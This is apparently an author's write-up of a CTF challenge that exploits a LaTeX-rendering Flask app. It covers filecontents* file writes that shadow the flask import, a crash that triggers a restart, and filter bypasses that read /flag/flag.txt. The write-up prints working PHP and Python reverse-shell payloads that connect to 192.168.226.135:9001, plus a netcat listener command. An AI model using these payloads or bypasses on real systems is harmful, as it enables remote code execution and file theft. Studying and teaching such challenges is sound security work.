# TeXnically Insecure

## Intro

This challenge is meant to showcase a very obscure LaTeX exploit, paired with a nice flask exploit/misconfiguration. It therefore tries to block a lot of exploits to force people into the more obscure one. However, that did not work, as people found unintentional bypasses which will be described [here](#bypasses). If you know an exploit that isn't listed here, feel free to tell me, I'd be interested :)

## Blocked Exploits

I did a bunch of research on known LaTeX exploits. These should all be properly blocked, as you can see in the source code. Some of them are also pretty cool though, so feel free to give these resources a read:

- <https://book.jorianwoltjer.com/languages/latex>
- <https://book.hacktricks.xyz/pentesting-web/formula-csv-doc-latex-ghostscript-injection>
- <https://sk3rts.rocks/posts/bypassing-latex-filters/>
- <https://0day.work/hacking-with-latex/>
- <https://tex.stackexchange.com/tags/catcodes/info>
- <https://www.researchgate.net/publication/234829253_Are_text-only_data_formats_safe_or_use_this_LATEX_class_file_to_Pwn_your_computer>

## The actual exploit

Finding the intended exploit is a bit harder. Knowing that I was looking for the `filecontents` command, I found these 3 resources that mention it:

- <https://texdoc.org/serve/latex2e.pdf/0>
- <https://de.mirrors.cicku.me/ctan/macros/latex/contrib/filecontents/filecontents.pdf>
- actually mentioned as an exploit: <https://0xdf.gitlab.io/2023/11/04/htb-topology.html>

I originally discovered it in the first resource while doing HTB Topology. Before you ask: No, this challenge is not based on Topology. This exploit was in no way intentional there, but happened to work. The only similarity is that both challenges require the exploitation of LaTeX. 
The idea now is that using the semi-deprecated command called `filecontents`, you can write files to your current working directory (and probably subdirectories too). If the app was written in PHP, this would be fairly straightforward:

```LaTeX
\begin{filecontents}{shell.php}
<?php system(bash -c 'bash -i >& /dev/tcp/192.168.226.135/9001 0>&1'); ?>
\end{filecontents}
```

Now we could simply navigate to `shell.php` with our browser after setting up a netcat listener, and we'd have a shell. However, I wrote the challenge in Python, cause I honestly didn't wanna touch PHP. Sooo, we need a different approach.
We can still use filecontents to write files, for example a `flask.py`. That doesn't actually do anything, at least not on its own. The next step would be to make the app restart. That causes it to reload its imports. Python always checks its current working directory first, so it'd be using our `flask.py` when importing flask. But let's first try writing our file with a python reverse shell:

```LaTeX
\begin{filecontents}{flask.py}
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.226.135",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")
\end{filecontents}
```

Here is what that looks like:

```
%% LaTeX2e file `flask.py'
%% generated by the `filecontents' environment
%% from source `output' on 2024/12/19.
%%
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.226.135",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")
```

Again, in PHP this would work because PHP doesn't give a shit about anything. Python however sees the LaTeX comments that it doesn't understand and promptly crashes. Not helpful. 
When digging deeper, we can find that there in another variant of the `filecontents` command, which is `filecontents*`. This is exactly the same thing, but without the comment. Problem solved.
Now our `flask.py` looks like this:

```
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.226.135",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")
```

While this is cool, we still need a way to restart the python server. There are a few interesting things to notice in the source code. Firstly, it uses supervisord to restart the app whenever it crashes. So if we can crash the app, it would restart, reload its imports and execute our reverse shell.
If you've worked with flask before, you're probably well aware that while it may throw some errors here or there, it doesn't crash. But the configuration in use here is no default configuration. It uses `passthrough_errors=True` and `threaded=False`. The first is usually set to disable flasks error handling so that you can use an external debugger. For our purposes, it simply means that an actual error in flask itself will make it crash. Disabling threading simply means that one error actually kills it and it doesn't continue limping on in another thread.
So all we need is some way to make the flask crash and we'll get our shell and with that the flag. There are likely countless ways you could do that. One way I stumbled upon is sending it the IP address `[1:1]` in a GET request, as you can see in the [solve script](./solve.py). 

### Full exploit chain

First, creating our flask.py. Make sure you edit IP and port and don't have a `flask.py` already as we aren't using the overwrite argument here. Also, Python loves its indentation, so keep that in mind if you write a script.

```LaTeX
\begin{filecontents*}{flask.py}
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.226.135",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")
\end{filecontents*}
```

Next, Set up a netcat listener: `nc -lnvp 9001`

Lastly, crash the server, for example using the `crash` function in the [solve script](./solve.py)

## Bypasses

The simplest bypass, and I can't believe I didn't catch that before releasing the challenge (only noticed during the CTF -.-), is writing commands into the `\begin{}`, just like in the intended solution. The blacklist filters for commands beginning with `\`, so it can be trivially bypassed this way. At this point, you can simply use `\begin{input}{/flag/flag.txt}`. This bypass was then fixed in the revenge challenge.
But there's more, as I came to learn. For example this `\begin{inpu\iftrue t\fi}{"/flag/flag.txt"}`.
Or this:

```LaTeX
\pdfobj stream file {/flag/flag.txt}
\pdfrefobj 1
hallo
```

Or this:

```LaTeX
\ttfamily
\pdffiledump offset 0 length \pdffilesize{/flag/flag.txt}{/flag/flag.txt}
```

So yeah, what we learn here is that LaTeX is utterly broken. If you didn't know already, it should be abundantly clear now :D
